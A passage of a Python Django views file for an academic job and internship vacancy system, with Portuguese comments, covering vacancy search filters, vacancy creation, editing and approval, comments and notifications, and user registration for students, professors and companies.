\"on\" else checkBoxRemake.append(\"off\")\n 
checkBoxRemake.append(\"on\") if request.POST.get('ic') == \"on\" else checkBoxRemake.append(\"off\")\n checkBoxRemake.append(\"on\") if request.POST.get('outros') == \"on\" else checkBoxRemake.append(\"off\")\n radioRemake = int(request.POST.get('radioNivel')) if request.POST.get('radioNivel') is not None else 0\n salarioRemake = request.POST.get('salario')\n minvalueRemake = request.POST.get('min-value')\n maxvalueRemake = request.POST.get('max-value')\n avaliacaoRemake = request.POST.get('avaliacao')\n\n aux=0\n filtroSelecionado = request.POST.getlist('filtro')\n inputTexto = request.POST.getlist('texto')\n inputCurso = request.POST.getlist('curso')\n inputArea = request.POST.getlist('area')\n for filtro in filtroSelecionado:\n filtroRemake.append(filtro)\n textoRemake.append(inputTexto[aux]) if inputTexto[aux] is not None and inputTexto[aux] != \"\" else textoRemake.append(\"\")\n cursoRemake.append(int(inputCurso[aux]))\n areaRemake.append(int(inputArea[aux]))\n aux+=1\n\n ordem_resultados = ordemRemake\n if is_admin(request.user):\n # ORDENA POR VAGAS MAIS RECENTES\n if ordem_resultados == \"1\":\n vagas = Vaga.objects.filter().order_by('-data_submissao')\n # ORDENA POR DATA DE SUBMISSAO\n elif ordem_resultados == \"2\":\n vagas = Vaga.objects.filter().annotate(num_insc=Count('alunos_inscritos')).order_by(\n '-num_insc')\n # ORDENA POR AVALIACOES\n elif ordem_resultados == \"3\":\n vagas = Vaga.objects.filter().order_by('-nota_media')\n # ORDENA POR MAIS COMENTADAS\n elif ordem_resultados == \"4\":\n vagas = Vaga.objects.filter(situacao=Vaga.ATIVA).annotate(num_comentarios=Count('comentario')).order_by('-num_comentarios')\n # ORDENA POR MENOR PRAZO\n elif ordem_resultados == \"5\":\n vagas = Vaga.objects.filter().order_by('data_validade')\n # ORDENACAO PADRAO (NAO ENTRA NOS CASOS DO SELECT)\n else:\n vagas = Vaga.objects.filter()\n\n #TRATA SELECAO ESPECIAL DO SUPER USUARIO POR SITUACAO DA VAGA\n superuser_option = superuserOptionRemake\n vagasAux = []\n for vaga in vagas:\n if superuser_option == \"1\" and vaga.situacao == Vaga.ATIVA:\n vagasAux.append(vaga)\n if (vaga.situacao == Vaga.CADASTRADA or vaga.situacao == Vaga.EDITADA) and superuser_option == \"2\":\n vagasAux.append(vaga)\n if superuser_option == \"3\" and vaga.situacao == Vaga.INATIVA:\n vagasAux.append(vaga)\n if superuser_option == \"4\" and vaga.situacao == Vaga.REPROVADA:\n vagasAux.append(vaga)\n if superuser_option == \"5\":\n vagasAux = vagas\n break\n vagas = vagasAux\n else:\n # ORDENA POR VAGAS MAIS RECENTES\n if ordem_resultados == \"1\":\n vagas = Vaga.objects.filter(situacao=Vaga.ATIVA).order_by('-data_submissao')\n # ORDENA POR DATA DE SUBMISSAO\n elif ordem_resultados == \"2\":\n vagas = Vaga.objects.filter(situacao=Vaga.ATIVA).annotate(num_insc=Count('alunos_inscritos')).order_by('-num_insc')\n # ORDENA POR AVALIACOES\n elif ordem_resultados == \"3\":\n vagas = Vaga.objects.filter(situacao=Vaga.ATIVA).order_by('-nota_media')\n # ORDENA POR MAIS COMENTADAS\n elif ordem_resultados == \"4\":\n vagas = Vaga.objects.filter(situacao=Vaga.ATIVA).annotate(num_comentarios=Count('comentario')).order_by('-num_comentarios')\n # ORDENA POR MENOR PRAZO\n elif ordem_resultados == \"5\":\n vagas = Vaga.objects.filter(situacao=Vaga.ATIVA).order_by('data_validade')\n # ORDENACAO PADRAO (NAO ENTRA NOS CASOS DO SELECT)\n else:\n vagas = Vaga.objects.filter(situacao=Vaga.ATIVA)\n\n vagasAux = []\n #TRATA FILTROS CHECKBOX\n for vaga in vagas:\n addFlag = False\n if checkBoxRemake[0] == \"on\" and vaga.tipo_vaga == 1:\n 
addFlag = True\n elif checkBoxRemake[1] == \"on\" and vaga.tipo_vaga == 2:\n addFlag = True\n elif checkBoxRemake[2] == \"on\" and vaga.tipo_vaga == 3:\n addFlag = True\n elif checkBoxRemake[3] == \"on\" and vaga.tipo_vaga == 4:\n addFlag = True\n if radioRemake == 1 and not verificaCursoByNivel(vaga, 1):\n addFlag = False\n if radioRemake == 2 and not verificaCursoByNivel(vaga, 2):\n addFlag = False\n if radioRemake == 3and not verificaCursoByNivel(vaga, 3):\n addFlag = False\n if radioRemake == 4 and not verificaCursoByNivel(vaga, 4):\n addFlag = False\n if radioRemake == 5 and not verificaCursoByNivel(vaga, 5):\n addFlag = False\n if addFlag == True:\n vagasAux.append(vaga)\n\n vagas = vagasAux\n\n vagasAux = []\n #TRATA FILTRO VALORES E SLIDERS\n for vaga in vagas:\n if salarioRemake is not None and salarioRemake != \"\":\n if vaga.valor_bolsa >= float(salarioRemake) and vaga.carga_horaria_semanal >= int(minvalueRemake) \\\n and vaga.carga_horaria_semanal <= int(maxvalueRemake) and vaga.nota_media >= int(avaliacaoRemake):\n vagasAux.append(vaga)\n continue\n elif vaga.carga_horaria_semanal >= int(minvalueRemake) and vaga.carga_horaria_semanal <= int(maxvalueRemake) and vaga.nota_media >= int(avaliacaoRemake):\n vagasAux.append(vaga)\n vagas = vagasAux\n\n #Listas auxiliares para tratar os dados em lista do request.post\n filtroSelecionado = filtroRemake\n inputTexto = textoRemake\n inputCurso = cursoRemake\n inputArea = areaRemake\n aux = 0\n for filtro in filtroSelecionado:\n #Lista auxiliar de vagas filtradas para lista de resposta da solicitação\n vagasAux = []\n #FILTRO - TODOS OS CAMPOS\n #VERIFICA SE O INPUT DE TEXTO TEM CASAMENTO EM QUALQUER UM DOS CAMPOS: Nome do gerente de vagas, areas de atuacao, cursos, titulo, descricao, local ou beneficios da vaga.\n if filtro == \"1\":\n if inputTexto[aux] is not None and inputTexto[aux] != \"\":\n busca.append(inputTexto[aux])\n for vaga in vagas:\n if inputTexto[aux] in vaga.gerente_vaga.user.first_name or inputTexto[aux] in vaga.gerente_vaga.user.last_name:\n vagasAux.append(vaga)\n continue\n if verificaAreasAtuacao(vaga, inputTexto[aux]):\n vagasAux.append(vaga)\n continue\n if verificaCursos(vaga, inputTexto[aux]):\n vagasAux.append(vaga)\n continue\n if inputTexto[aux] in vaga.titulo:\n vagasAux.append(vaga)\n continue\n if inputTexto[aux] in vaga.descricao:\n vagasAux.append(vaga)\n continue\n if vaga.gerente_vaga.user.groups.filter(name__in=['Empresa']).exists():\n if inputTexto[aux] in vaga.local or inputTexto[aux] in vaga.gerente_vaga.empresa.endereco:\n vagasAux.append(vaga)\n continue\n else:\n if inputTexto[aux] in vaga.local:\n vagasAux.append(vaga)\n continue\n if inputTexto[aux] in vaga.local:\n vagasAux.append(vaga)\n continue\n if inputTexto[aux] in vaga.beneficios:\n vagasAux.append(vaga)\n continue\n vagas = vagasAux\n #FILTRO - NOME DE VAGAS\n #VERIFICA SE O INPUT DE TEXTO TEM CASAMENTO COM O TITULO DA VAGA\n elif filtro == \"2\":\n if inputTexto[aux] is not None and inputTexto[aux] != \"\":\n busca.append(inputTexto[aux])\n for vaga in vagas:\n if inputTexto[aux] in vaga.titulo:\n vagasAux.append(vaga)\n vagas = vagasAux\n #FILTRO - EMPRESAS E/OU PROFESSORES\n #VERIFICA SE O INPUT DE TEXTO TEM CASAMENTO COM O NOME DO GERENTE DE VAGA\n elif filtro == \"3\":\n if inputTexto[aux] is not None and inputTexto[aux] != \"\":\n busca.append(inputTexto[aux])\n for vaga in vagas:\n if inputTexto[aux] in vaga.gerente_vaga.user.first_name or inputTexto[aux] in vaga.gerente_vaga.user.last_name:\n vagasAux.append(vaga)\n vagas = 
vagasAux\n #FILTRO - AREAS DE ATUACAO\n #VERIFICA SE O SELECT DE AREAS DE ATUACAO (RETORNA ID) TEM CASAMENTO COM O ID DE PELO MENOS UMA AREA DE ATUACAO DA VAGA\n elif filtro == \"4\":\n area = AreaAtuacao.objects.get(id=inputArea[aux])\n busca.append(area.nome)\n for vaga in vagas:\n if verificaAreasAtuacaoByID(vaga, inputArea[aux]):\n vagasAux.append(vaga)\n vagas = vagasAux\n #FILTRO - CURSOS\n #VERIFICA SE O SELECT DE CURSOS (RETORNA ID) TEM CASAMENTO COM O ID DE PELO MENOS UM CURSO DA VAGA (SE A VAGA NAO TIVER CURSO, ELA EH CONSIDERADA DISPONIVEL PARA TODOS)\n elif filtro == \"5\":\n curso = Curso.objects.get(id=inputCurso[aux])\n busca.append(curso.nome)\n for vaga in vagas:\n if verificaCursoByID(vaga, inputCurso[aux]):\n vagasAux.append(vaga)\n vagas = vagasAux\n #FILTRO - DESCRICAO\n #VERIFICA SE O INPUT DE TEXTO TEM CASAMENTO COM A DESCRICAO OU OS BENEFICIOS DA VAGA\n elif filtro == \"6\":\n if inputTexto[aux] is not None and inputTexto[aux] != \"\":\n busca.append(inputTexto[aux])\n for vaga in vagas:\n if inputTexto[aux] in vaga.descricao or inputTexto[aux] in vaga.beneficios:\n vagasAux.append(vaga)\n vagas = vagasAux\n #FILTRO - LOCAL\n #VERIFICA SE O INPUT DE TEXTO TEM CASAMENTO COM O LOCAL DA VAGA OU LOCAL DA EMPRESA\n elif filtro == \"7\":\n if inputTexto[aux] is not None and inputTexto[aux] != \"\":\n busca.append(inputTexto[aux])\n for vaga in vagas:\n if vaga.gerente_vaga.user.groups.filter(name__in=['Empresa']).exists():\n if inputTexto[aux] in vaga.local or inputTexto[aux] in vaga.gerente_vaga.empresa.endereco:\n vagasAux.append(vaga)\n else:\n if inputTexto[aux] in vaga.local:\n vagasAux.append(vaga)\n vagas = vagasAux\n #FILTRO - NENHUM CASO ATENDIDO\n else:\n vagasAux = Vaga.objects.filter(situacao=Vaga.ATIVA)\n vagas = vagasAux\n #Incrementa auxiliar iterador da lista\n aux+=1\n\n if request.method == 'POST':\n # Se a busca vier do \"Pesquisa rápida\", será tratado nesse trecho\n if 'buscar_keyword' in request.POST and request.POST.get('buscar_keyword') is not None and request.POST.get(\n 'buscar_keyword') != '':\n vagas = Vaga.objects.filter(situacao=Vaga.ATIVA)\n busca_rapida = request.POST.get('buscar_keyword')\n vagas = vagas.filter(titulo__icontains=busca_rapida)\n busca.append(request.POST.get('buscar_keyword'))\n initial = busca_rapida\n\n busca = ', '.join(busca)\n context = {'now': datetime.now(), 'form': form, 'vagas': vagas, 'busca': busca, 'initial': initial,\n 'formRemake': formRemake, 'ordemRemake': ordemRemake, 'checkBoxRemake': checkBoxRemake, 'salarioRemake': salarioRemake, 'minvalueRemake': minvalueRemake, 'maxvalueRemake': maxvalueRemake,\n 'avaliacaoRemake': avaliacaoRemake, 'superuserOptionRemake': superuserOptionRemake, 'radioRemake': radioRemake, 'filtroRemake': filtroRemake, 'textoRemake': textoRemake, 'areaRemake': areaRemake,\n 'cursoRemake': cursoRemake, 'cursosChoices': Curso.objects.all(), 'areasChoices': AreaAtuacao.objects.all(), 'filtrosPesquisa': filtrosPesquisa}\n return render(request, 'sva/vaga/pesquisarVagas.html', context)\n\n\n@login_required\n@user_passes_test(isGerenteVaga, login_url=\"/home/\")\ndef principal_vaga(request):\n return render(request, 'sva/vaga/vaga.html')\n\n\n@login_required\n@user_passes_test(isGerenteVaga, login_url=\"/home/\")\ndef gerenciar_vaga(request):\n context = {}\n gerente = GerenteVaga.objects.get(user=request.user)\n if gerente is None:\n return redirect(\"login\")\n\n form = FormularioGerenciaVaga(request.POST)\n context['form'] = form\n if form.is_valid() and form.cleaned_data['vaga_nome']!= 
\"\":\n context['vagas'] = Vaga.objects.filter(gerente_vaga_id=gerente.id, titulo__icontains=form.cleaned_data['vaga_nome']).order_by('-data_aprovacao','-data_alteracao','-data_submissao')\n else:\n context['vagas'] = Vaga.objects.filter(gerente_vaga_id=gerente.id).order_by('-data_aprovacao','-data_alteracao','-data_submissao')\n return render(request, 'sva/vaga/gerenciarVaga.html', context)\n\n@csrf_exempt\n@login_required\n@transaction.atomic\n@user_passes_test(isGerenteVaga, login_url=\"/home/\")\ndef criar_vaga(request):\n gerente = GerenteVaga.objects.get(user=request.user)\n if gerente is None or gerente.situacao != \"DEFERIDO\":\n messages.error(request, mensagens.ERRO_GERENTE_INATIVO, mensagens.MSG_ERRO)\n return redirect(principal_vaga)\n if request.is_ajax():\n novaarea = AreaAtuacao()\n if AreaAtuacao.objects.filter(nome=request.POST['area']).first():\n return redirect(gerenciar_areaatuacao)\n novaarea.nome = request.POST['area']\n print (\"Nova area\"+request.POST['area'])\n novaarea.situacao = AreaAtuacao.AGUARDANDO_APROVACAO\n novaarea.save()\n\n if request.method == 'POST':\n form = FormularioVaga(request.POST)\n if form.is_valid():\n form.save(commit=False)\n gerente = GerenteVaga.objects.get(user=request.user)\n if gerente is None:\n messages.error(request, mensagens.ERRO_PERMISSAO_NEGADA, mensagens.MSG_ERRO)\n return redirect(principal_vaga)\n form.instance.gerente_vaga = gerente\n form.save()\n messages.success(request, 'Vaga criada com sucesso')\n return redirect(gerenciar_vaga)\n else:\n form = FormularioVaga()\n context = {'form': form, 'gerente': gerente}\n return render(request, 'sva/vaga/criarVaga.html', context)\n\n\n@login_required\n@user_passes_test(isGerenteVaga, login_url=\"/home/\")\ndef lista_alunos_vaga(request, pkvaga):\n gerente = GerenteVaga.objects.get(user=request.user)\n if gerente is None:\n messages.error(request, mensagens.ERRO_PERMISSAO_NEGADA, mensagens.MSG_ERRO)\n return redirect(principal_vaga)\n\n vaga = get_object_or_404(Vaga, id=pkvaga)\n\n if vaga.gerente_vaga_id == gerente.id:\n context = {}\n context['alunos'] = Aluno.objects.filter(vagas_inscritas=vaga)\n context['qtd_alunos'] = Aluno.objects.filter(vagas_inscritas=vaga).count()\n context['vaga'] = vaga\n return render(request, 'sva/vaga/ListarAlunosVaga.html', context)\n\n else:\n messages.error(request, mensagens.ERRO_PERMISSAO_NEGADA, mensagens.MSG_ERRO)\n return redirect(principal_vaga)\n\n\n@login_required\n@transaction.atomic\n@user_passes_test(isGerenteVaga, login_url=\"/home/\")\ndef encerrar_inscricao_vaga(request, pkvaga):\n gerente = GerenteVaga.objects.get(user=request.user)\n if gerente is None:\n messages.error(request, mensagens.ERRO_PERMISSAO_NEGADA, mensagens.MSG_ERRO)\n return redirect(principal_vaga)\n\n vaga = get_object_or_404(Vaga, pk=pkvaga)\n if vaga is None or vaga.gerente_vaga_id != gerente.id:\n messages.error(request, mensagens.ERRO_PERMISSAO_NEGADA, mensagens.MSG_ERRO)\n return redirect(principal_vaga)\n else:\n vaga.data_validade = datetime.now()\n vaga.situacao = 4\n vaga.save()\n messages.success(request, 'Inscrições encerradas')\n return redirect(gerenciar_vaga)\n\n\ndef visualizar_vaga(request, pkvaga):\n context = {}\n form = IndicarVaga(request.POST)\n vaga = get_object_or_404(Vaga, id=pkvaga)\n context['comentarios'] = Comentario.objects.filter(vaga=vaga)\n context['vaga'] = vaga\n context['form'] = form\n gerente = GerenteVaga.objects.get(vagas=vaga)\n aluno_inscrito_exists = False\n if(request.user.groups.filter(name='Aluno').exists()):\n aluno = 
Aluno.objects.get(user_id=request.user.id)\n context['aluno'] = aluno\n # Verifica se aluno logado eh interessado na vaga\n if (vaga.alunos_interessados.filter(id=aluno.id).exists()):\n context['interessado'] = 1\n else:\n context['interessado'] = 0\n #Verifica se aluno logado eh inscrito na vaga\n if(vaga.alunos_inscritos.filter(id=aluno.id).exists()):\n aluno_inscrito_exists = True\n context['inscrito'] = 1\n context['interessado'] = 2\n else:\n context['inscrito'] = 0\n\n context['gerente'] = gerente\n if request.user != gerente.user and vaga.situacao != 3 and not is_admin(request.user) and not aluno_inscrito_exists:\n messages.error(request, mensagens.ERRO_PERMISSAO_NEGADA, mensagens.MSG_ERRO)\n return redirect(principal_vaga)\n\n if request.method == 'POST':\n if 'subscribe' in request.POST:\n vaga.alunos_inscritos.add(aluno)\n if (vaga.alunos_interessados.filter(id=aluno.id).exists()):\n vaga.alunos_interessados.remove(aluno)\n messages.success(request, 'Candidatado com sucesso')\n return redirect(visualizar_vaga, vaga.id)\n elif 'unsubscribe' in request.POST:\n vaga.alunos_inscritos.remove(aluno)\n messages.success(request, 'Candidatura removida com sucesso')\n return redirect(visualizar_vaga, vaga.id)\n elif 'interested' in request.POST:\n vaga.alunos_interessados.add(aluno)\n return redirect(visualizar_vaga, vaga.id)\n elif 'uninterested' in request.POST:\n vaga.alunos_interessados.remove(aluno)\n return redirect(visualizar_vaga, vaga.id)\n elif 'indicar' in request.POST:\n if form.is_valid():\n try:\n notifica = Notificacao()\n notifica.tipo = 1\n notifica.mensagem = aluno.user.first_name + ' indicou uma vaga para você. Clique para visualizar'\n notifica.link = reverse(\"vaga_visualizar\", args={pkvaga})\n notifica.usuario = User.objects.get(email=form.cleaned_data['email'])\n try:\n Aluno.objects.get(user=notifica.usuario)\n except:\n messages.error(request, 'O email indicado é de um usuário do sistema que não tem permissão para ser indicado')\n return redirect(visualizar_vaga, vaga.id)\n notifica.vaga = vaga\n notifica.save()\n mensagem = aluno.user.first_name+ ' indicou uma vaga para você. \\n\\n Descrição:\\n\\n ' \\\n +vaga.descricao\n send_mail('Vaga indicada - Sistema de Vagas Acadêmicas',\n mensagem, 'sva@cefetmg.br', [form.cleaned_data['email']])\n except:\n mensagem = aluno.user.first_name + 'indicou uma vaga para você. 
\\n\\n Descrição:\\n\\n' \\\n + vaga.descricao\n send_mail('Vaga indicada - Sistema de Vagas Acadêmicas',\n mensagem, 'sva@cefetmg.br', [form.cleaned_data['email']])\n messages.success(request, 'Indicado com sucesso')\n return redirect(visualizar_vaga, vaga.id)\n context['formulario_aprovacao'] = FormularioAprovacao()\n return render(request, 'sva/vaga/visualizarVaga.html', context)\n\n\n@login_required\n@transaction.atomic\n@user_passes_test(isGerenteVaga, login_url=\"/home/\")\ndef editar_vaga(request, pkvaga):\n gerente = GerenteVaga.objects.get(user=request.user)\n if gerente is None:\n messages.error(request, mensagens.ERRO_PERMISSAO_NEGADA, mensagens.MSG_ERRO)\n return redirect(principal_vaga)\n vaga = get_object_or_404(Vaga, id=pkvaga)\n if vaga.gerente_vaga_id != gerente.id:\n messages.error(request, mensagens.ERRO_PERMISSAO_NEGADA, mensagens.MSG_ERRO)\n return redirect(principal_vaga)\n\n if request.method == 'GET':\n form = FormularioVaga(instance=vaga)\n context = {}\n if vaga.data_validade is not None:\n data_val = vaga.data_validade.strftime('%Y-%m-%dT%H:%M')\n context['data_val'] = data_val\n context['form'] = form\n return render(request, 'sva/vaga/editarVaga.html', context)\n\n form = FormularioVaga(request.POST, instance=vaga)\n if form.is_valid():\n vaga.cursos = form.cleaned_data['cursos']\n vaga.areas_atuacao = form.cleaned_data['areas_atuacao']\n vaga.titulo = form.cleaned_data['titulo']\n vaga.descricao = form.cleaned_data['descricao']\n vaga.data_validade = form.cleaned_data['data_validade']\n vaga.carga_horaria_semanal = form.cleaned_data['carga_horaria_semanal']\n vaga.local = form.cleaned_data['local']\n vaga.valor_bolsa = form.cleaned_data['valor_bolsa']\n vaga.beneficios = form.cleaned_data['beneficios']\n vaga.data_aprovacao = None\n vaga.situacao = 2\n vaga.save()\n messages.success(request, 'Editado com sucesso')\n return redirect(gerenciar_vaga)\n\n\n@login_required\n@user_passes_test(is_admin)\ndef gerenciar_vaga_pendente(request):\n if 'filtro' in request.POST and request.POST['filtro'] is not None and request.POST['filtro'] != '':\n vagas = Vaga.objects.filter(data_aprovacao__isnull=True, situacao__gte=1, situacao__lte=2, titulo__icontains=request.POST['filtro']).order_by('-data_alteracao','-data_submissao')\n else:\n vagas = Vaga.objects.filter(data_aprovacao__isnull=True, situacao__gte=1, situacao__lte=2,).order_by('-data_alteracao','-data_submissao')\n context = {\n 'titulo_lista': 'Vagas com aprovação pendente',\n 'liberar_cadastro': True,\n 'vagas': vagas,\n }\n return render(request, 'sva/vaga/ListarVagasPendentes.html', context)\n\n\n@transaction.atomic\n@login_required\n@require_POST\n@user_passes_test(is_admin)\ndef aprovar_vaga(request, pkvaga):\n\n vaga = get_object_or_404(Vaga, id=pkvaga)\n form = FormularioAprovacao(request.POST)\n if vaga is not None and form.is_valid() and form.cleaned_data['aprovado'] == 'true':\n vaga.situacao = Vaga.ATIVA\n vaga.data_aprovacao = datetime.now()\n vaga.usuario_aprovacao = request.user\n vaga.save()\n mensagem = 'Seu cadastro da vaga %s foi aprovado no SVA por %s. 
Segue mensagem:\\n\\n %s' \\\n % (vaga.titulo, request.user.first_name, form.cleaned_data['justificativa'])\n send_mail('Avaliação de cadastro de vaga - Sistema de Vagas Acadêmicas',\n mensagem, 'sva@cefetmg.br', [vaga.gerente_vaga.user.email])\n else:\n vaga.situacao = Vaga.REPROVADA\n vaga.descricao = form.cleaned_data['justificativa'].upper() + '\\n\\n' + vaga.descricao\n vaga.save()\n mensagem = 'Seu cadastro da vaga %s foi recusado no SVA por %s. Segue mensagem:\\n\\n%s\\n\\nSVA' \\\n % (vaga.titulo, request.user.first_name, form.cleaned_data['justificativa'])\n send_mail('Avaliação de cadastro de vaga - Sistema de Vagas Acadêmicas',\n mensagem, 'sva@cefetmg.br', [vaga.gerente_vaga.user.email])\n messages.success(request, mensagens.SUCESSO_ACAO_CONFIRMADA, mensagens.MSG_SUCCESS)\n\n return redirect(visualizar_vaga, pkvaga)\n\n@login_required(login_url='/accounts/login/')\ndef adicionar_comentario(request,pkvaga):\n vaga = get_object_or_404(Vaga, pk=pkvaga)\n comentario = Comentario()\n if request.method == 'POST':\n form = ComentarioForm(request.POST)\n if form.is_valid():\n try:\n user = User.objects.get(id=form.cleaned_data['resposta'])\n realname = user.first_name+\" \"+user.last_name\n parte1 = form.cleaned_data['text'].split(\"[\")\n string = parte1[1].split(\"]\")\n comentario.user = request.user\n comentario.vaga = vaga\n comentario.text = form.cleaned_data['text']\n comentario.save()\n if string[0] == realname:\n notifica = Notificacao()\n notifica.tipo = 9\n notifica.mensagem = request.user.first_name + ' respondeu ao seu comentario. Clique para visualizar'\n notifica.link = reverse(\"vaga_visualizar\", args={pkvaga})\n notifica.usuario = user\n notifica.vaga = vaga\n notifica.save()\n messages.success(request, mensagens.SUCESSO_ACAO_CONFIRMADA, mensagens.MSG_SUCCESS)\n else:\n notifica = Notificacao()\n notifica.tipo = 8\n notifica.mensagem = request.user.first_name + ' fez um comentário em uma de suas vagas. Clique para visualizar'\n notifica.link = reverse(\"vaga_visualizar\", args={pkvaga})\n notifica.usuario = vaga.gerente_vaga.user\n notifica.vaga = vaga\n notifica.save()\n messages.success(request, mensagens.SUCESSO_ACAO_CONFIRMADA, mensagens.MSG_SUCCESS)\n except:\n comentario.user = request.user\n comentario.vaga = vaga\n comentario.text = form.cleaned_data['text']\n comentario.save()\n\n if request.user.first_name != vaga.gerente_vaga.user.first_name:\n notifica = Notificacao()\n notifica.tipo = 8\n notifica.mensagem = request.user.first_name + 'fez um comentário em uma de suas vagas. 
Clique para visualizar'\n notifica.link = reverse(\"vaga_visualizar\", args={pkvaga})\n notifica.usuario = vaga.gerente_vaga.user\n notifica.vaga = vaga\n notifica.save()\n messages.success(request, mensagens.SUCESSO_ACAO_CONFIRMADA, mensagens.MSG_SUCCESS)\n return redirect(visualizar_vaga, pkvaga)\n\n@login_required(login_url='/accounts/login/')\n@user_passes_test(is_admin)\ndef excluir_comentario(request,pkcomentario):\n comment = get_object_or_404(Comentario, pk=pkcomentario)\n vaga= comment.vaga\n comment.delete()\n messages.success(request, mensagens.SUCESSO_ACAO_CONFIRMADA, mensagens.MSG_SUCCESS)\n return redirect(visualizar_vaga, vaga.id)\n###############################################################################\n# CADASTRO #\n###############################################################################\n\n\ndef cadastro(request):\n context = {\n 'form_aluno': FormularioCadastroAluno(),\n 'form_professor': FormularioCadastroProfessor(),\n 'form_empresa': FormularioCadastroEmpresa(),\n 'cadastro': True\n }\n return render(request, 'sva/cadastro.html', context)\n\n\n@transaction.atomic\ndef cadastrar_empresa(request):\n form = FormularioCadastroEmpresa(request.POST or None)\n empresa = Empresa()\n if request.method == 'POST' and form.is_valid():\n username = form.cleaned_data['cnpj']\n usuario = User.objects.create_user(username)\n empresa.user = usuario\n empresa.user.email = form.cleaned_data['email']\n empresa.cnpj = form.cleaned_data['cnpj']\n empresa.nome = form.cleaned_data['nome']\n empresa.user.email = form.cleaned_data['email']\n empresa.user.set_password(form.cleaned_data['password'])\n empresa.user.groups = Group.objects.filter(Q(name='Empresa') | Q(name='Gerente Vagas'))\n empresa.user.save()\n empresa.save()\n #empresa.data_aprovacao = datetime.now()\n messages.info(request, mensagens.SUCESSO_AGUARDE_APROVACAO, mensagens.MSG_SUCCESS)\n return HttpResponseRedirect('/home/')\n return render(request, 'sva/empresa/CadastroEmpresa.html', {'form': form})\n\n\n@transaction.atomic\ndef cadastrar_aluno(request):\n form = FormularioCadastroAluno(request.POST or None)\n aluno = Aluno()\n if request.method == 'POST' and form.is_valid():\n username = form.cleaned_data['cpf']\n usuario = User.objects.create_user(username)\n aluno.user = usuario\n aluno.user.username = form.cleaned_data['cpf']\n name = form.cleaned_data['name']\n fullname = name.split(' ')\n aluno.user.first_name=fullname[0]\n fullname.remove(fullname[0])\n last_name=\"\"\n for aux in fullname:\n last_name=last_name+\" \"+aux\n aluno.user.last_name = last_name\n aluno.user.email = form.cleaned_data['email']\n aluno.user.set_password(form.cleaned_data['password'])\n aluno.user.save()\n aluno.curso = form.cleaned_data['curso']\n aluno.endereco = ',' + ',' + ',' + ','\n aluno.cpf = form.cleaned_data['cpf']\n aluno.user.groups = Group.objects.filter(name='Aluno')\n aluno.save()\n messages.success(request, mensagens.SUCESSO_ACAO_CONFIRMADA, mensagens.MSG_SUCCESS)\n return HttpResponseRedirect('/home/')\n return render(request, 'sva/aluno/CadastroAluno.html', {'form': form})\n\n\n@transaction.atomic\ndef cadastrar_professor(request):\n form = FormularioCadastroProfessor(request.POST or None)\n professor = Professor()\n if request.method == 'POST' and form.is_valid():\n username = form.cleaned_data['cpf']\n usuario = User.objects.create_user(username)\n professor.curso = form.cleaned_data['curso']\n professor.user_ptr_id = usuario.id\n professor.user = usuario\n professor.user.username = form.cleaned_data['cpf']\n name 
= form.cleaned_data['name']\n fullname = name.split(' ')\n professor.user.first_name = fullname[0]\n fullname.remove(fullname[0])\n last_name = \"\"\n for aux in fullname:\n last_name = last_name + \" \" + aux\n professor.user.last_name = last_name\n professor.user.email = form.cleaned_data['email']\n professor.user.set_password(form.cleaned_data['password'])\n professor.user.save()\n professor.cpf = form.cleaned_data['cpf']\n professor.siape = form.cleaned_data['siape']\n professor.user.groups = Group.objects.filter(Q(name='Professor') | Q(name='Gerente Vagas'))\n professor.save()\n messages.info(request, mensagens.SUCESSO_AGUARDE_APROVACAO, mensagens.MSG_SUCCESS)\n return redirect('login')\n return render(request, 'sva/professor/CadastroProfessor.html', {'form': form})\n\n\n###############################################################################\n# EMPRESA #\n###############################################################################\n\n@transaction.atomic\n@login_required(login_url='/accounts/login/')\ndef editar_empresa(request, pk):\n\n if pk != str(request.user.id):\n return HttpResponseRedirect('/home/')\n\n empresa = get_object_or_404(Empresa, user_id=pk)\n Nome = empresa.user.first_name + ' ' + empresa.user.last_name\n if empresa.endereco is not None:\n parte = empresa.endereco.split(\",\")\n initial = {\n 'Nome_Completo': Nome,\n 'Telefone': empresa.telefone,\n 'Email': empresa.user.email,\n 'Site': empresa.website,\n 'Bairro': parte[0],\n 'Rua': parte[1] if len(parte) >= 2 else '',\n 'Numero': parte[2] if len(parte) >= 3 else '',\n 'Complemento': parte[3] if len(parte) >= 4 else '',\n 'Cidade': parte[4] if len(parte) >= 5 else '',\n 'Estado': parte[5] if len(parte) >= 6 else '',\n }\n else:\n initial = {'Nome_Completo': Nome,\n 'Telefone': empresa.telefone,\n 'Email': empresa.user.email,\n 'Site': empresa.website}\n\n if request.method == 'GET':\n form = FormularioEditarEmpresa(instance=empresa, initial=initial)\n if request.method == 'POST':\n form = FormularioEditarEmpresa(request.POST, instance=empresa, initial=initial)\n if form.is_valid():\n empresa.website = form.cleaned_data['Site'] if form.cleaned_data['Site'] is not None else \"\"\n empresa.telefone = form.cleaned_data['telefone'] if form.cleaned_data['telefone'] is not None else \"\"\n empresa.nome = form.cleaned_data['nome']\n empresa.endereco = form.cleaned_data['Bairro'] + ',' + \\\n form.cleaned_data['Rua'] + ',' + \\\n form.cleaned_data['Numero'] + ',' + \\\n form.cleaned_data['Complemento'] + ',' + \\\n form.cleaned_data['Cidade'] + ',' + \\\n form.cleaned_data['Estado']\n empresa.save()\n empresa.user.first_name = form.cleaned_data['nome']\n empresa.user.last_name = \"\"\n empresa.user.email = form.cleaned_data['Email']\n empresa.user.save()\n messages.success(request, 'Editado com sucesso')\n return redirect(exibir_empresa, empresa.user_id)\n else:\n messages.error(request, 'Falha ao editar')\n return redirect(exibir_empresa, empresa.user_id)\n\n return render(request, 'sva/empresa/EditarEmpresa.html', {'form': form, 'empresa': empresa})\n\n@transaction.atomic\n@login_required(login_url='/accounts/login/')\ndef excluir_empresa(request, pk):\n empresa = get_object_or_404(Empresa, user_id=pk)\n if pk != str(request.user.id):\n messages.error(request, mensagens.ERRO_PERMISSAO_NEGADA, mensagens.MSG_ERRO)\n return HttpResponseRedirect('/home/')\n vagas = Vaga.objects.filter(gerente_vaga=empresa)\n for vaga in vagas:\n if vaga.vencida is False and vaga.situacao == 3:\n messages.error(request, 
